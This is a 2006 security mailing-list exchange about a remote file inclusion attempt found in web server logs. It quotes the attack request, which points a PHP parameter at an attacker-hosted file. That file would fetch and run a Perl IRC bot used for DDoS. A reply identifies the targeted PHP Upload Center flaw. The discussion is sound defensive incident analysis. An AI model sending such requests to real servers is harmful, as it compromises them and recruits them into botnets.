Re: http://thebesthack.altervista.org/input.txt

["Bojan Zdrnja" <bojan.zdrnja () gmail com>]

Hi Josh,

On 12/14/06, modincidents () mail securityfocus com
<modincidents () mail securityfocus com> wrote:
> An incidents subscriber emailed me stating that they were getting the
> following in there 404 logs:
>
> PHP.asp</activate.php?language=conf&footerpage=http://thebesthack.altervista.org/input.txt?
>
>
> It appears that an attacker is attempting to exploit a remote file include
> vulnerability. If the attack had been successful and the
> http://thebesthack.altervista.org/input.txt file was processed by the web
> server, it would have attempted to download, run, and then delete a file
> from http://thebesthack.altervista.org/ddos.pl.
>
> ddos.pl is a simple IRC bot written in perl that will connect to
> dos-net.sytes.net:6667 and join #ddos.
>
> Does anyone know the specific vulnerability that this attack is attempting
> to exploit?

Yep, it's PHP Upload Center, http://www.securityfocus.com/bid/21412/info

Cheers,

Bojan

------------------------------------------------------------------------------
This List Sponsored by: Black Hat

Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas. 
World renowned security experts reveal tomorrow's threats today. Free of 
vendor pitches, the Briefings are designed to be pragmatic regardless of your 
security environment. Featuring 36 hands-on training courses and 10 conference 
tracks, networking opportunities with over 2,500 delegates from 40+ nations. 

http://www.blackhat.com
------------------------------------------------------------------------------